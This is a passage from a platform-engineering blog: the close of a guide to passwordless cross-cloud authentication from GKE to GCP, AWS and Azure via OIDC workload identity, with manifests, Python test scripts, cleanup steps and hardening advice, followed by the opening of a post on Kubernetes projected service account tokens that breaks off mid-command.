  name: gke-cross-cloud-sa
  namespace: default
  annotations:
    iam.gke.io/gcp-service-account: gke-cross-cloud-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com
---
apiVersion: v1
kind: Pod
metadata:
  name: gke-gcp-test
  namespace: default
spec:
  serviceAccountName: gke-cross-cloud-sa
  restartPolicy: Never
  containers:
  - name: gcp-test
    image: python:3.11-slim
    command:
      - sh
      - -c
      - |
        pip install --no-cache-dir google-auth google-cloud-storage && \
        python /app/test_gcp_from_gke.py
    env:
    - name: GCP_PROJECT_ID
      # Replace with your actual project ID
      value: "YOUR_PROJECT_ID"
    volumeMounts:
    - name: app-code
      mountPath: /app
  volumes:
  - name: app-code
    configMap:
      name: gcp-test-code-gke
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: gcp-test-code-gke
  namespace: default
data:
  test_gcp_from_gke.py: |
    # Code will be provided below

Test Code (Python):

# test_gcp_from_gke.py
from google.cloud import storage
from google.auth import default
import os
import sys

def test_gcp_access():
    """Test GCP GCS access using native GKE Workload Identity"""
    try:
        # Automatically uses workload identity
        credentials, project = default()

        storage_client = storage.Client(
            credentials=credentials,
            project=os.environ.get('GCP_PROJECT_ID')
        )

        # List buckets
        buckets = list(storage_client.list_buckets(max_results=5))

        print("✅ GCP Authentication successful!")
        print(f"Found {len(buckets)} GCS buckets:")
        for bucket in buckets:
            print(f"  - {bucket.name}")

        print(f"\n🔐 Authenticated with project: {project}")

        return True
    except Exception as e:
        print(f"❌ GCP Authentication failed: {str(e)}")
        import traceback
        traceback.print_exc()
        return False

if __name__ == "__main__":
    success = test_gcp_access()
    sys.exit(0 if success else 1)

Success Logs:

If you see logs like below for the pod kubectl logs -f -n default gke-gcp-test, it means the GKE to GCP Authentication worked.

✅ GCP Authentication successful!
Found <number> GCS buckets:
  - bucket-1
  - bucket-2
  - gke-cross-cloud
  - ...

🔐 Authenticated with project: YOUR_PROJECT_ID

3.2 Authenticating to AWS from GKE

Cross-Cloud Authentication Flow:

Setup Steps:

# 1. Get GKE OIDC provider URL
PROJECT_ID=$(gcloud config get-value project)
CLUSTER_LOCATION="us-central1"  # Change to your cluster location (region or zone)

# Get the full OIDC issuer URL
OIDC_ISSUER=$(curl -s https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq -r .issuer)

echo "OIDC Issuer: ${OIDC_ISSUER}"

# 2. Create OIDC provider in AWS
export AWS_PROFILE=<set to aws profile where you want to create this>

OIDC_PROVIDER=$(echo $OIDC_ISSUER | sed -e "s/^https:\/\///")

# Extract hostname for thumbprint
OIDC_HOST=$(echo $OIDC_ISSUER | sed 's|https://||' | sed 's|/.*||')

# Get the thumbprint
THUMBPRINT=$(echo | openssl s_client -servername ${OIDC_HOST} -connect ${OIDC_HOST}:443 -showcerts 2>/dev/null \
  | openssl x509 -fingerprint -sha1 -noout \
  | sed 's/SHA1 Fingerprint=//;s/://g')

echo "Thumbprint: ${THUMBPRINT}"

# Create the OIDC provider in AWS
aws iam create-open-id-connect-provider \
  --url $OIDC_ISSUER \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list $THUMBPRINT

# 3. Create trust policy
YOUR_AWS_ACCOUNT_ID=$(aws sts get-caller-identity | jq -r .Account)
cat > gke-aws-trust-policy.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::${YOUR_AWS_ACCOUNT_ID}:oidc-provider/${OIDC_PROVIDER}"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "${OIDC_PROVIDER}:sub": "system:serviceaccount:default:gke-cross-cloud-sa",
          "${OIDC_PROVIDER}:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
EOF

# 4. Create IAM role
aws iam create-role \
  --role-name gke-to-aws-role \
  --assume-role-policy-document file://gke-aws-trust-policy.json

# 5. Attach permissions
aws iam attach-role-policy \
  --role-name gke-to-aws-role \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 3.2, if authentication is working you will see success logs as shown below -

# scenario3-2-gke-to-aws.yaml
apiVersion: v1
kind: Pod
metadata:
  name: gke-aws-test
  namespace: default
spec:
  # gke-cross-cloud-sa SA is created in Scenario 3.1 above
  serviceAccountName: gke-cross-cloud-sa
  restartPolicy: Never
  containers:
  - name: aws-test
    image: python:3.11-slim
    command:
      - sh
      - -c
      - |
        pip install --no-cache-dir boto3 && \
        python /app/test_aws_from_gke.py
    env:
    - name: AWS_ROLE_ARN
      # Replace ACCOUNT_ID with your AWS account ID
      value: "arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/gke-to-aws-role"
    - name: AWS_WEB_IDENTITY_TOKEN_FILE
      value: /var/run/secrets/tokens/token
    - name: AWS_REGION
      value: us-east-1
    volumeMounts:
    - name: app-code
      mountPath: /app
    - name: aws-token
      mountPath: /var/run/secrets/tokens
      readOnly: true
  volumes:
  - name: app-code
    configMap:
      name: aws-test-code-gke
  - name: aws-token
    projected:
      sources:
        - serviceAccountToken:
            path: token
            expirationSeconds: 3600
            audience: "sts.amazonaws.com"  # must match your AWS OIDC provider audience

---
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-test-code-gke
  namespace: default
data:
  test_aws_from_gke.py: |
    # Code will be provided below

Test Code (Python):

# test_aws_from_gke.py
import boto3
import sys

def test_aws_access():
    """Test AWS S3 access from GKE using OIDC federation"""
    try:
        # SDK automatically uses OIDC credentials from environment variables
        s3_client = boto3.client('s3')

        # List buckets to verify access
        response = s3_client.list_buckets()

        print("✅ AWS Authentication successful!")
        print(f"Found {len(response['Buckets'])} S3 buckets:")
        for bucket in response['Buckets'][:5]:
            print(f"  - {bucket['Name']}")

        # Get caller identity
        sts_client = boto3.client('sts')
        identity = sts_client.get_caller_identity()
        print(f"\n🔐 Authenticated as: {identity['Arn']}")

        return True
    except Exception as e:
        print(f"❌ AWS Authentication failed: {str(e)}")
        import traceback
        traceback.print_exc()
        return False

if __name__ == "__main__":
    success = test_aws_access()
    sys.exit(0 if success else 1)

Success Logs:

If you see logs like below for the pod kubectl logs -f -n default gke-aws-test, it means the GKE to AWS Authentication worked.

✅ AWS Authentication successful!
Found <number of buckets> S3 buckets:
  - bucket-1
  - bucket-2
  - ...

🔐 Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/gke-to-aws-role/botocore-session-<some random number>

3.3 Authenticating to Azure from GKE

Setup Steps:

# Make sure you have done `az login` and set the subscription before proceeding

# 1. Get GKE OIDC issuer
PROJECT_ID=$(gcloud config get-value project)
CLUSTER_LOCATION="us-central1"  # Change to your cluster location

OIDC_ISSUER=$(curl -s https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq -r .issuer)

echo "OIDC Issuer: ${OIDC_ISSUER}"

# 2. Create Azure AD application
az ad app create --display-name gke-to-azure-app

APP_ID=$(az ad app list \
  --display-name gke-to-azure-app \
  --query "[0].appId" -o tsv)

echo "App ID: ${APP_ID}"

# 3. Create service principal
az ad sp create --id $APP_ID

# 4. Create federated credential
cat > gke-federated-credential.json <<EOF
{
  "name": "gke-federated-identity",
  "issuer": "${OIDC_ISSUER}",
  "subject": "system:serviceaccount:default:gke-cross-cloud-sa",
  "audiences": [
    "api://AzureADTokenExchange"
  ]
}
EOF

az ad app federated-credential create \
  --id $APP_ID \
  --parameters gke-federated-credential.json

# 5. Assign Azure permissions
SUBSCRIPTION_ID=$(az account show --query id -o tsv)

az role assignment create \
  --assignee $APP_ID \
  --role "Storage Blob Data Reader" \
  --scope "/subscriptions/$SUBSCRIPTION_ID"

# 6. Create resource group (if not exists)
az group create \
  --name gke-cross-cloud \
  --location eastus \
  --subscription $SUBSCRIPTION_ID

# 7. Create storage account
az storage account create \
  --name gkecrosscloud \
  --resource-group gke-cross-cloud \
  --location eastus \
  --sku Standard_LRS \
  --kind StorageV2 \
  --subscription $SUBSCRIPTION_ID

# 8. Create blob container
az storage container create \
  --name test-container \
  --account-name gkecrosscloud \
  --subscription $SUBSCRIPTION_ID \
  --auth-mode login

# you will need TENANT_ID below
TENANT_ID=$(az account show --query tenantId -o tsv)

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 3.3, if authentication is working you will see success logs as shown below -

# scenario3-3-gke-to-azure.yaml
apiVersion: v1
kind: Pod
metadata:
  name: gke-azure-test
  namespace: default
spec:
  # gke-cross-cloud-sa SA is created in Scenario 3.1 above
  serviceAccountName: gke-cross-cloud-sa
  restartPolicy: Never
  containers:
  - name: azure-test
    image: python:3.11-slim
    command:
      - sh
      - -c
      - |
        pip install --no-cache-dir azure-identity azure-storage-blob && \
        python /app/test_azure_from_gke.py
    env:
    - name: AZURE_CLIENT_ID
      # Replace with your actual App ID
      value: "YOUR_APP_ID"
    - name: AZURE_TENANT_ID
      # Replace with your actual Tenant ID (get via: az account show --query tenantId -o tsv)
      value: "YOUR_TENANT_ID"
    - name: AZURE_FEDERATED_TOKEN_FILE
      value: /var/run/secrets/azure/tokens/azure-identity-token
    - name: AZURE_STORAGE_ACCOUNT
      # Replace with your actual storage account name
      value: "gkecrosscloud"
    volumeMounts:
    - name: app-code
      mountPath: /app
    - name: azure-token
      mountPath: /var/run/secrets/azure/tokens
      readOnly: true
  volumes:
  - name: app-code
    configMap:
      name: azure-test-code-gke
  - name: azure-token
    projected:
      sources:
      - serviceAccountToken:
          path: azure-identity-token
          expirationSeconds: 3600
          audience: api://AzureADTokenExchange
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: azure-test-code-gke
  namespace: default
data:
  test_azure_from_gke.py: |
    # Code will be provided below

Test Code (Python):

# test_azure_from_gke.py
from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient
import os
import sys

def test_azure_access():
    """Test Azure Blob Storage access from GKE using federated credentials"""
    try:
        # DefaultAzureCredential automatically detects federated identity
        credential = DefaultAzureCredential()

        storage_account = os.environ.get('AZURE_STORAGE_ACCOUNT')
        account_url = f"https://{storage_account}.blob.core.windows.net"

        blob_service_client = BlobServiceClient(
            account_url=account_url,
            credential=credential
        )

        # List containers
        containers = list(blob_service_client.list_containers())

        print("✅ Azure Authentication successful!")
        print(f"Found {len(containers)} containers:")
        for container in containers[:5]:
            print(f"  - {container.name}")

        return True
    except Exception as e:
        print(f"❌ Azure Authentication failed: {str(e)}")
        import traceback
        traceback.print_exc()
        return False

if __name__ == "__main__":
    success = test_azure_access()
    sys.exit(0 if success else 1)

Success Logs:

If you see logs like below for the pod kubectl logs -f -n default gke-azure-test, it means the GKE to Azure Authentication worked.

✅ Azure Authentication successful!
Found 1 containers:
  - test-container

Scenario 3 Cleanup

After testing Scenario 3 (GKE cross-cloud authentication), clean up the resources:

# ============================================
# GCP Resources Cleanup
# ============================================

PROJECT_ID=$(gcloud config get-value project)
GSA_EMAIL="gke-cross-cloud-sa@${PROJECT_ID}.iam.gserviceaccount.com"

# Remove IAM policy binding
gcloud iam service-accounts remove-iam-policy-binding ${GSA_EMAIL} \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:${PROJECT_ID}.svc.id.goog[default/gke-cross-cloud-sa]" \
  --quiet

# Delete GCS bucket
gcloud storage rm -r gs://gke-cross-cloud

# Remove project-level permissions
gcloud projects remove-iam-policy-binding ${PROJECT_ID} \
  --member="serviceAccount:${GSA_EMAIL}" \
  --role="roles/storage.admin"

# Delete GCP service account
gcloud iam service-accounts delete ${GSA_EMAIL} --quiet

# ============================================
# AWS Resources Cleanup
# ============================================

# Get OIDC provider info
PROJECT_ID=$(gcloud config get-value project)
CLUSTER_LOCATION="us-central1"  # Update to your cluster location

OIDC_ISSUER=$(curl -s https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq -r .issuer)
OIDC_PROVIDER=$(echo $OIDC_ISSUER | sed -e "s/^https:\/\///")

# Delete IAM role policy attachments
aws iam detach-role-policy \
  --role-name gke-to-aws-role \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

# Delete IAM role
aws iam delete-role --role-name gke-to-aws-role

# Delete OIDC provider
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
aws iam delete-open-id-connect-provider \
  --open-id-connect-provider-arn "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_PROVIDER}"

# ============================================
# Azure Resources Cleanup
# ============================================

# Get App ID
APP_ID=$(az ad app list \
  --display-name gke-to-azure-app \
  --query "[0].appId" -o tsv)

# Delete role assignments
SUBSCRIPTION_ID=$(az account show --query id -o tsv)
az role assignment delete \
  --assignee $APP_ID \
  --scope "/subscriptions/$SUBSCRIPTION_ID"

# Delete federated credentials
az ad app federated-credential delete \
  --id $APP_ID \
  --federated-credential-id gke-federated-identity

# Delete service principal
az ad sp delete --id $APP_ID

# Delete app registration
az ad app delete --id $APP_ID

# Delete resource group
az group delete --name gke-cross-cloud --subscription $SUBSCRIPTION_ID --yes --no-wait

# ============================================
# Kubernetes Resources Cleanup
# ============================================

# Delete test pods
kubectl delete pod gke-gcp-test --force --ignore-not-found
kubectl delete pod gke-aws-test --force --ignore-not-found
kubectl delete pod gke-azure-test --force --ignore-not-found

# Delete ConfigMaps
kubectl delete configmap gcp-test-code-gke --ignore-not-found
kubectl delete configmap aws-test-code-gke --ignore-not-found
kubectl delete configmap azure-test-code-gke --ignore-not-found

# Delete service account
kubectl delete serviceaccount gke-cross-cloud-sa --ignore-not-found

Security Best Practices

1. Principle of Least Privilege

Grant only the minimum permissions required
Use resource-specific policies instead of broad access
Regularly audit and review permissions

Example:

# ❌ BAD: Subscription-wide access
az role assignment create \
  --assignee $APP_ID \
  --role "Storage Blob Data Reader" \
  --scope "/subscriptions/$SUBSCRIPTION_ID"

# ✅ GOOD: Resource-specific access
az role assignment create \
  --assignee $APP_ID \
  --role "Storage Blob Data Reader" \
  --scope $STORAGE_ACCOUNT_ID

2. Namespace Isolation

Use different service accounts per namespace
Implement namespace-level RBAC
Separate production and development workloads

3. Token Lifetime Management

Use short-lived tokens (default is usually 1 hour)
Enable automatic token rotation
Monitor token usage and expiration

4. Audit Logging

Enable cloud provider audit logs
Monitor authentication attempts
Set up alerts for suspicious activity

# Example: Add labels for better tracking
apiVersion: v1
kind: ServiceAccount
metadata:
  name: cross-cloud-sa
  namespace: production
  labels:
    app: my-app
    environment: production
    team: platform
  annotations:
    purpose: "Cross-cloud authentication for data pipeline"

5. Network Security

Use private endpoints where possible
Implement egress filtering
Use VPC/VNet peering for enhanced security

6. Credential Scanning

Never commit workload identity configs to git
Use tools like git-secrets, gitleaks
Implement pre-commit hooks

Production Hardening

For production deployments, implement these additional security measures:

1. Strict Audience Claims

# ❌ Avoid wildcards or non-standard audiences
"${OIDC_PROVIDER}:aud": "*"

# ❌ Avoid using Azure audience for AWS (works but not best practice)
"${OIDC_PROVIDER}:aud": "api://AzureADTokenExchange"  # For AWS targets

# ✅ Use cloud-specific audience matching
# For AWS:
"${OIDC_PROVIDER}:aud": "sts.amazonaws.com"

# For Azure:
"audiences": ["api://AzureADTokenExchange"]

# For GCP:
--allowed-audiences="//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL/providers/PROVIDER"

2. Exact Subject Matching

# ❌ Avoid broad patterns in production
--attribute-condition="assertion.sub.startsWith('system:serviceaccount:')"

# ✅ Use exact namespace and service account
--attribute-condition="assertion.sub=='system:serviceaccount:production:app-sa'"

3. Dedicated Identity Pools per Cluster

Create separate Workload Identity Pools for each cluster
Avoid sharing pools across environments
Simplifies rotation and isolation

4. Resource-Scoped IAM

# ❌ Avoid project/subscription-wide roles
gcloud projects add-iam-policy-binding $PROJECT_ID \
  --member="serviceAccount:sa@project.iam.gserviceaccount.com" \
  --role="roles/storage.admin"

# ✅ Use bucket-level or resource-level IAM
gsutil iam ch serviceAccount:sa@project.iam.gserviceaccount.com:objectViewer \
  gs://specific-bucket

5. OIDC Provider Rotation

Rotate cluster OIDC providers when cluster is recreated
Update federated credentials accordingly
Maintain backward compatibility during transition

6. Comprehensive Audit Logging

# AWS: Enable CloudTrail
aws cloudtrail create-trail --name cross-cloud-audit

# Azure: Enable Azure Monitor
az monitor diagnostic-settings create

# GCP: Audit logs are enabled by default
gcloud logging read "protoPayload.serviceName=sts.googleapis.com"

7. Avoid Common Anti-Patterns

❌ Don't use roles/storage.admin when read access suffices
❌ Don't use startsWith() conditions in production
❌ Don't share service accounts across namespaces
❌ Don't use overly permissive audience claims

Performance Considerations

Token Caching

Cloud SDKs automatically cache tokens, but you can optimize:

# Reuse clients instead of creating new ones
# Bad - creates new client each time
def bad_example():
    for i in range(100):
        s3 = boto3.client('s3')
        s3.list_buckets()

# Good - reuse client
def good_example():
    s3 = boto3.client('s3')
    for i in range(100):
        s3.list_buckets()

Connection Pooling

Use connection pooling for better performance:

import boto3
from botocore.config import Config

config = Config(
    max_pool_connections=50,
    retries={'max_attempts': 3}
)

s3 = boto3.client('s3', config=config)

Comparison Matrix

Feature	EKS (IRSA)	AKS (Workload Identity)	GKE (Workload Identity)
Setup Complexity	Medium	Low	Low
Native Integration	AWS	Azure	GCP
Cross-cloud Support	Via OIDC	Via Federated Credentials	Via WIF Pools
Token Injection	Automatic	Automatic (webhook)	Automatic
Token Lifetime	1 hour (configurable)	24 hours (default)	1 hour (default)
Audience Customization	✅ Yes	✅ Yes	✅ Yes
Pod Identity Webhook	Not required	Required	Not required
Annotation Required	Role ARN	Client ID	GSA Email
Native to K8s	Yes	Yes	Yes (GKE only)
Requires External JSON	No (AWS), Yes (cross-cloud)	No (Azure), Yes (cross-cloud)	No (GCP), Yes (cross-cloud)
STS Call Required	Yes	Yes	Yes
Most Complex Setup	Medium	Medium	High (for cross-cloud)

Cloud-Specific Characteristics

Characteristic	AWS	Azure	GCP
Validation Method	AssumeRoleWithWebIdentity	Federated credential match	Workload Identity Pool exchange
Token Exchange	Direct STS call	Entra ID token exchange	Multi-step (STS → SA impersonation)
Best Practice Audience	`sts.amazonaws.com`	`api://AzureADTokenExchange`	WIF Pool-specific
Audience Flexibility	Strict (validates aud claim)	Strict (must match federated credential)	Flexible (configured in pool provider)
Thumbprint Required	Yes (root CA)	No	No

Migration Guide

From Static Credentials to Workload Identity

Step 1: Audit current credential usage

# Find all secrets with credentials
kubectl get secrets --all-namespaces -o json | \
  jq -r '.items[] | select(.type=="Opaque") | .metadata.name'

Step 2: Set up workload identity (follow scenarios above)

Step 3: Deploy test pod with workload identity

Step 4: Validate access before removing static credentials

Step 5: Update application code to remove explicit credential loading

Step 6: Remove credential secrets

kubectl delete secret <credential-secret-name>

Step 7: Monitor and verify in production

Conclusion

Cross-cloud authentication using workload identity provides a secure, scalable, and maintainable approach to multi-cloud Kubernetes deployments. By leveraging OIDC federation, you eliminate the risks associated with static credentials while gaining fine-grained access control and better auditability.

Key Takeaways:

Always prefer workload identity over static credentials
Use native integrations when available (IRSA for EKS, Workload Identity for AKS/GKE)
Follow the principle of least privilege in IAM policies with resource-specific scopes
Implement strict claim matching in production (exact sub and aud matching)
Test thoroughly before production deployment
Monitor and audit authentication patterns regularly with cloud-native logging
Keep SDKs updated for the latest security patches
Use dedicated identity pools per cluster in production
Rotate OIDC providers when clusters are recreated

Additional Resources:

Final Cleanup

If you're completely done with all scenarios and want to delete the Kubernetes clusters, refer to the Cluster Cleanup section in the prerequisites.

This guide was created to help platform engineers implement secure, passwordless authentication across multiple cloud providers in Kubernetes environments.

Originally published at https://platformwale.blog

Understanding Kubernetes Projected Service Account Tokens

Piyush Jajoo — Sun, 08 Feb 2026 12:37:45 +0000

Service account tokens are the cornerstone of pod authentication in Kubernetes. With the introduction of projected service account tokens, Kubernetes has significantly improved security and flexibility in how pods authenticate to the API server and external services.

What Are Projected Service Account Tokens?

Projected service account tokens are time-bound, audience-scoped JSON Web Tokens (JWTs) that replace the legacy non-expiring service account tokens. They provide enhanced security through:

Time-bound expiration: Tokens automatically expire and are rotated
Audience binding: Tokens can be scoped to specific audiences
Automatic rotation: The kubelet automatically refreshes tokens before expiration

The Problem with Legacy Service Account Tokens

Before projected tokens, Kubernetes used legacy service account tokens that had several security limitations:

Never expire: Once created, they remain valid indefinitely unless manually revoked
No audience restriction: Can be used to authenticate to any service that accepts them
Stored as Secrets: Persisted in etcd, increasing the attack surface
Broad scope: If compromised, provide unrestricted access to the API server
Manual rotation: Required manual intervention to refresh or rotate

These limitations meant that if a token was leaked or a pod was compromised, attackers could potentially maintain persistent access to your cluster. Projected tokens solve these problems by being short-lived, automatically rotated, and scoped to specific audiences.

How Projected Tokens Work

Understanding the TokenRequest API

The TokenRequest API is a Kubernetes API (not provided by cloud providers) that generates service account tokens on-demand. It's part of the core Kubernetes API server and was introduced in Kubernetes 1.12 (stable in 1.20).

Key characteristics:

Endpoint: /api/v1/namespaces/{namespace}/serviceaccounts/{name}/token
Purpose: Creates short-lived, audience-bound tokens for service accounts
Parameters: Accepts expiration time and audience claims
Signature: Tokens are signed by the Kubernetes API server's private key

When you use a projected volume, the kubelet automatically calls this API on your behalf to request tokens, eliminating the need for manual token management.

What is a Projected Volume?

A projected volume is a special volume type in Kubernetes that can project (combine) multiple volume sources into a single directory. Think of it as a way to mount different types of data into your pod from various sources.

Common sources that can be projected:

serviceAccountToken: Dynamically generated tokens via TokenRequest API
configMap: Configuration data
secret: Sensitive data
downwardAPI: Pod metadata

For service account tokens, projected volumes enable the kubelet to:

Request fresh tokens from the TokenRequest API
Automatically refresh tokens before expiration
Mount tokens as files in the pod's filesystem
Handle all the complexity of token lifecycle management

This is different from the legacy approach where tokens were stored as static Secrets and mounted directly.

Token Generation Flow

Projected tokens use the TokenRequest API to generate short-lived tokens on-demand. Here's the typical flow:

Basic Configuration

Here's a simple example of configuring a projected service account token:

apiVersion: v1
kind: Pod
metadata:
  name: token-demo
spec:
  serviceAccountName: my-service-account
  containers:
  - name: app
    image: nginx
    volumeMounts:
    - name: token
      mountPath: /var/run/secrets/tokens
      readOnly: true
  volumes:
  - name: token
    projected:
      sources:
      - serviceAccountToken:
          path: token
          expirationSeconds: 3600
          audience: my-app

Using Projected Tokens with AKS (Azure Kubernetes Service)

AKS leverages projected tokens for Workload Identity, enabling pods to authenticate to Azure services without storing credentials.

Azure-Side Configuration

Before using Workload Identity in AKS, you need to set up the Azure side:

# 1. Create an Azure AD application (or Managed Identity)
az ad sp create-for-rbac --name "myapp-workload-identity"

# 2. Get the application's client ID
export APPLICATION_CLIENT_ID="<your-client-id>"

# 3. Create federated identity credential that trusts your AKS cluster
az ad app federated-credential create \
  --id $APPLICATION_CLIENT_ID \
  --parameters '{
    "name": "myapp-federated-credential",
    "issuer": "https://oidc.prod-aks.azure.com/<tenant-id>/<cluster-oidc-issuer-id>/",
    "subject": "system:serviceaccount:default:workload-identity-sa",
    "audiences": ["api://AzureADTokenExchange"]
  }'

# 4. Assign Azure RBAC roles to the application
az role assignment create \
  --assignee $APPLICATION_CLIENT_ID \
  --role "Storage Blob Data Contributor" \
  --scope "/subscriptions/<subscription-id>/resourceGroups/<rg-name>/providers/Microsoft.Storage/storageAccounts/<storage-account>"

Key Configuration Points:

Issuer: Your AKS cluster's OIDC issuer URL (unique per cluster)
Subject: Must match the format system:serviceaccount:<namespace>:<service-account-name>
Audiences: Must be api://AzureADTokenExchange for Workload Identity

AKS Workload Identity Setup

apiVersion: v1
kind: ServiceAccount
metadata:
  name: workload-identity-sa
  namespace: default
  annotations:
    azure.workload.identity/client-id: "YOUR_AZURE_CLIENT_ID"
---
apiVersion: v1
kind: Pod
metadata:
  name: aks-workload-identity-demo
  namespace: default
  labels:
    azure.workload.identity/use: "true"  # This label triggers the webhook to inject volumes
spec:
  serviceAccountName: workload-identity-sa
  containers:
  - name: app
    image: mcr.microsoft.com/azure-cli
    command: ["sleep", "infinity"]
    # Note: The following are automatically injected by the AKS Workload Identity webhook
    # when the pod has the label "azure.workload.identity/use: true":
    # 
    # Environment variables:
    # - AZURE_CLIENT_ID
    # - AZURE_TENANT_ID
    # - AZURE_FEDERATED_TOKEN_FILE
    # - AZURE_AUTHORITY_HOST
    #
    # Volume mounts:
    # - name: azure-identity-token
    #   mountPath: /var/run/secrets/azure/tokens
    #   readOnly: true
    #
    # Volumes:
    # - name: azure-identity-token
    #   projected:
    #     sources:
    #     - serviceAccountToken:
    #         path: azure-identity-token
    #         expirationSeconds: 3600
    #         audience: api://AzureADTokenExchange

Important: In practice, when using AKS Workload Identity, you typically only need to:

Annotate your service account with azure.workload.identity/client-id
Add the label azure.workload.identity/use: "true" to your pod
Reference that service account in your pod spec

The pod spec would look like this:

apiVersion: v1
kind: Pod
metadata:
  name: aks-workload-identity-demo
  namespace: default
  labels:
    azure.workload.identity/use: "true"
spec:
  serviceAccountName: workload-identity-sa
  containers:
  - name: app
    image: mcr.microsoft.com/azure-cli
    command: ["sleep", "infinity"]
    # Everything else is auto-injected!

AKS will automatically inject the environment variables, volume mounts, and projected volumes for you through its mutating admission webhook.

How it works in AKS:

Using Projected Tokens with EKS (Elastic Kubernetes Service)

EKS uses projected tokens for IAM Roles for Service Accounts (IRSA), allowing pods to assume AWS IAM roles.

AWS-Side Configuration

Before using IRSA in EKS, you need to configure AWS IAM:

# 1. Get your EKS cluster's OIDC provider URL
aws eks describe-cluster --name my-cluster --query "cluster.identity.oidc.issuer" --output text
# Output: https://oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE

# 2. Create an IAM OIDC identity provider for your cluster
# Note: If you created your cluster with eksctl or with OIDC enabled, this may already exist
# You can verify with: aws iam list-open-id-connect-providers
eksctl utils associate-iam-oidc-provider --cluster my-cluster --approve

# 3. Create an IAM policy for S3 access
cat > s3-policy.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": [
        "arn:aws:s3:::my-bucket",
        "arn:aws:s3:::my-bucket/*"
      ]
    }
  ]
}
EOF

aws iam create-policy --policy-name S3AccessPolicy --policy-document file://s3-policy.json

# 4. Create an IAM role with a trust policy that allows the service account
cat > trust-policy.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::ACCOUNT_ID:oidc-provider/oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE:sub": "system:serviceaccount:default:s3-access-sa",
          "oidc.eks.us-west-2.amazonaws.com/id/EXAMPLED539D4633E53DE1B71EXAMPLE:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
EOF

aws iam create-role --role-name s3-access-role --assume-role-policy-document file://trust-policy.json

# 5. Attach the policy to the role
aws iam attach-role-policy \
  --role-name s3-access-role \
  --policy-arn arn:aws:iam::ACCOUNT_ID:policy/S3AccessPolicy

Key Configuration Points:

Trust Policy Condition: Must match system:serviceaccount:<namespace>:<service-account-name>
Audience: Must be sts.amazonaws.com for IRSA
OIDC Provider: Must be registered as a trusted identity provider in IAM

EKS IRSA Configuration

apiVersion: v1
kind: ServiceAccount
metadata:
  name: s3-access-sa
  namespace: default
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::ACCOUNT_ID:role/s3-access-role
---
apiVersion: v1
kind: Pod
metadata:
  name: eks-irsa-demo
  namespace: default
spec:
  serviceAccountName: s3-access-sa
  containers:
  - name: app
    image: amazon/aws-cli
    command: ["sleep", "infinity"]
    # Note: The following are automatically injected by the EKS Pod Identity Webhook
    # when the service account has the annotation "eks.amazonaws.com/role-arn":
    #
    # Environment variables:
    # - AWS_ROLE_ARN: arn:aws:iam::ACCOUNT_ID:role/s3-access-role
    # - AWS_WEB_IDENTITY_TOKEN_FILE: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
    #
    # Volume mounts:
    # - name: aws-iam-token
    #   mountPath: /var/run/secrets/eks.amazonaws.com/serviceaccount
    #   readOnly: true
    #
    # Volumes:
    # - name: aws-iam-token
    #   projected:
    #     sources:
    #     - serviceAccountToken:
    #         path: token
    #         expirationSeconds: 86400
    #         audience: sts.amazonaws.com

Important: In practice, when using EKS with IRSA, you typically only need to:

Annotate your service account with eks.amazonaws.com/role-arn
Reference that service account in your pod spec

The pod spec would look like this:

apiVersion: v1
kind: Pod
metadata:
  name: eks-irsa-demo
  namespace: default
spec:
  serviceAccountName: s3-access-sa
  containers:
  - name: app
    image: amazon/aws-cli
    command: ["sleep", "infinity"]
    # Everything else is auto-injected!

EKS will automatically inject the environment variables, volume mounts, and projected volumes for you. The full configuration above is shown to illustrate what happens behind the scenes.

How it works in EKS:

Using Projected Tokens with GKE (Google Kubernetes Engine)

GKE uses projected tokens for Workload Identity, enabling pods to authenticate as Google Cloud service accounts.

GCP-Side Configuration

Before using Workload Identity in GKE, you need to configure Google Cloud:

# 1. Enable Workload Identity on your GKE cluster (if not already enabled)
gcloud container clusters update my-cluster \
  --workload-pool=PROJECT_ID.svc.id.goog

# 2. Create a Google Cloud service account
gcloud iam service-accounts create gcs-access-sa \
  --display-name="GCS Access Service Account"

# 3. Grant the GCP service account permissions to Cloud resources
gcloud projects add-iam-policy-binding PROJECT_ID \
  --member="serviceAccount:gcs-access-sa@PROJECT_ID.iam.gserviceaccount.com" \
